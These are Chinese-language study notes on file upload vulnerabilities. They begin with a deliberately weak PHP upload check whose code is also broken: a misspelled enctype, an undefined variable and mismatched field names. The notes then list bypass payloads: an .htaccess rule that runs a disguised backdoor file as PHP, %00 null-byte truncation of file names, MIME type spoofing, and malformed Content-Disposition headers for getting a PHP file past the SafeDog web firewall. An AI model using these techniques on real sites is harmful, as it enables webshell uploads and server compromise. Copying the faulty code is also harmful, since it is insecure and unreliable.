文件上传漏洞
<form action="" method="post" enctype="multipart/from-data" >
<input type="file" value="文件" name="sc">
<input type="submit" value="上传">
</form>
<?php
$type = $_FILES['SC']['type'];
/*
if($type=="image/jpeg"){
echo "success";
}
else{
echo "fail";
}
echo $name;
*/
$namearray=explode(".",$name);
if($namearray[1]=="jpg"){
echo "success";
}
else{
echo "fail";
}
?>
.htaccess攻击
(上传漏洞)
(伪装后门)
<FilesMatch "xiao">
SetHandler application/x-httpd-php
</FilesMatch>
%00截断上传 判断文件后缀 访问地址url问题
www.xxx.com/qq.jpg
www.xxx.com/qq.php%00.jpg
filename="123.php%00.jpg"
将 %00 进行编码
上传类型修改上传 判断文件类型 mime
Content-Type:image/jpeg
js绕过上传
时间长短判断,看源代码
安全狗上传bypass研究
Xss漏洞原理及利用方法
上传数据包:
Content-Disposition: form-data; name="upfile"; filename=x.php;
Content-Type: image/jpeg
Content-Disposition:
Name:上传数据包参数名(不能修改)
Filename:文件名
Content-Type:文件类型信息
1.修改filename值,去掉双引号加上分号(双引号去掉,不让他上传值,加分号就是表示没有结束,让狗继续匹配)
2.删除Content-Disposition的值